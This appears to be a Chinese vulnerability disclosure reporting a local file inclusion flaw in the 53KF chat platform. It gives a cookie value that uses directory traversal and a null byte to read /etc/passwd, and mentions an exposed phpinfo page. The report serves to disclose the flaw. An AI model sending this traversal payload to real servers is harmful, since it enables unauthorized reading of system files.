53KF企业在线平台LFI一枚

### 简要描述： http://chat.53kf.com/ LFI一枚 配合 http://chat.53kf.com/test.php 的phpinfo信息...导致xxoo.. ### 详细说明： http://chat.53kf.com/login.php/ 修改请求 Cookie: customer_service_language=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 [<img src="https://images.seebug.org/upload/201210/132126052193e503f3857dbc05b4701d2ee48560.png" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201210/132126052193e503f3857dbc05b4701d2ee48560.png) 结果： [<img src="https://images.seebug.org/upload/201210/13212643c1199f451bd96bcd6187200e3c238174.png" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201210/13212643c1199f451bd96bcd6187200e3c238174.png) 加上phpinfo提供的信息： [<img src="https://images.seebug.org/upload/201210/13212720cf4998c19f78e4939d287a81f74e167f.png" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201210/13212720cf4998c19f78e4939d287a81f74e167f.png) 未经授权....不进一步了。。 ### 漏洞证明： [<img src="https://images.seebug.org/upload/201210/132128401e4f68c542d00bfcd4bd07a2a05e8c95.png" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201210/132128401e4f68c542d00bfcd4bd07a2a05e8c95.png) [<img src="https://images.seebug.org/upload/201210/13212918eb98ff8bbcfedef44a3276cf21322de0.png" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201210/13212918eb98ff8bbcfedef44a3276cf21322de0.png) [<img src="https://images.seebug.org/upload/201210/132129516cd41ef47558c1f986490dce69f002dc.png" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201210/132129516cd41ef47558c1f986490dce69f002dc.png)